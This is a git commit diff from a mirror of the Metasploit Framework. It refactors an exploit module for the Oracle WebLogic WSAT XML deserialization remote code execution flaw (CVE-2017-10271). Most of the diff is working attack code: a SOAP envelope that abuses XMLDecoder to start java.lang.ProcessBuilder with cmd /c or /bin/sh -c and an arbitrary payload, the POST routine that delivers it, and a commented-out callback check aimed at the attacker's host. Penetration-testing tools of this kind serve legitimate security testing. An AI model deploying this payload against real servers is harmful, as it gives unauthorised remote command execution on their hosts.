infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix feedback from wvu-r7 

Fixes feedback from wvu-r7

- Consolidates payload to single method
- Replaces gsub! with standard encode method
- Note exploit discovery and proof of concept code used in authors (still seems weird to include the discovery as an author...)
- Change link
- Use `ARCH_CMD` instead of `[ARCH_CMD]`
- Remove Linux target as it's only Windows or Unix
- Remove timeout as I don't know how to pass it to `send_request_cgi`
MS-2855/keylogger-mettle-extension
Kevin Kirsche 2018-01-06 08:12:43 -05:00 committed by GitHub
parent 744f20304c
commit 867b32415d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 60 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

93
modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
View File

@ -16,13 +16,20 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q( 'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service.
), ),
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'], 'Author' => [
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
'Luffin', # Proof of Concept
'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
],
'References' => 'References' =>
[ [
[ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'], [ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
[ 'POC', 'https://github.com/Luffin/CVE-2017-10271'],
[ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
[ 'CVE', '2017-10271'] [ 'CVE', '2017-10271']
], ],
'Platform' => %w{ win linux unix }, 'Platform' => %w{ win linux unix },
@ -30,13 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Targets' => 'Targets' =>
[ [
[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
[ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ], [ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ],
[ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
], ],
'Payload' =>
{
'DisableNops' => true
},
'DisclosureDate' => "Oct 19 2017", 'DisclosureDate' => "Oct 19 2017",
# Note that this is by index, rather than name. It's generally easiest # Note that this is by index, rather than name. It's generally easiest
# just to put the default at the beginning of the list and skip this # just to put the default at the beginning of the list and skip this
@ -47,24 +49,27 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([ register_options([
OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
]) ])
end end
def cmd_payload def cmd_base
# Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need if target_platform == 'win'
# This escaping makes sure that our payload works! return 'cmd'
replacements = [ ['&', '&amp;'], ['"', '&quot;'], ["'", '&apos;'], ['<', '&lt;'], ['>', '&gt;'] ] else
xml_prepared = payload.encoded return '/bin/sh'
replacements.each do |r|
xml_prepared.gsub!(r[0], r[1])
end end
return xml_prepared
end end
def unix_payload def cmd_opt
if target_platform == 'win'
return '/c'
else
return '-c'
end
end
def process_builder_payload
# Generate a payload which will execute on a *nix machine using /bin/sh # Generate a payload which will execute on a *nix machine using /bin/sh
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <soapenv:Header>
@ -73,40 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
<object class="java.lang.ProcessBuilder"> <object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" > <array class="java.lang.String" length="3" >
<void index="0"> <void index="0">
<string>/bin/sh</string> <string>#{cmd_base}</string>
</void> </void>
<void index="1"> <void index="1">
<string>-c</string> <string>#{cmd_opt}</string>
</void> </void>
<void index="2"> <void index="2">
<string>#{cmd_payload}</string> <string>#{payload.encoded.encode(xml: :text)}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
# Generate a payload which will execute on a Windows machine using cmd
def windows_payload
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>#{cmd_payload}</string>
</void> </void>
</array> </array>
<void method="start"/> <void method="start"/>
@ -119,13 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
end end
# Not sure how to catch the response, so I'll leave this here in case someone can help # Not sure how to catch the response, so I'll leave this here in case someone can help
# def check_payload # This payload is used by sending to the RHOST and then you will receive an HTTP request
# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
# def http_check_payload
# xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> # xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
# <soapenv:Header> # <soapenv:Header>
# <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> # <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
# <java version="1.8" class="java.beans.XMLDecoder"> # <java version="1.8" class="java.beans.XMLDecoder">
# <object id="url" class="java.net.URL"> # <object id="url" class="java.net.URL">
# <string>http://{lhost}:{lport}/{random_uri}</string> # <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
# </object> # </object>
# <object idref="url"> # <object idref="url">
# <void id="stream" method = "openStream" /> # <void id="stream" method = "openStream" />
@ -142,14 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
# followed by the fake return address and then the payload. # followed by the fake return address and then the payload.
# #
def exploit def exploit
target_os = datastore['TARGET'].to_i xml_payload = process_builder_payload
xml_payload = ''
if target_os == 0
xml_payload = windows_payload
else
xml_payload = unix_payload
end
send_request_cgi( send_request_cgi(
'method' => 'POST', 'method' => 'POST',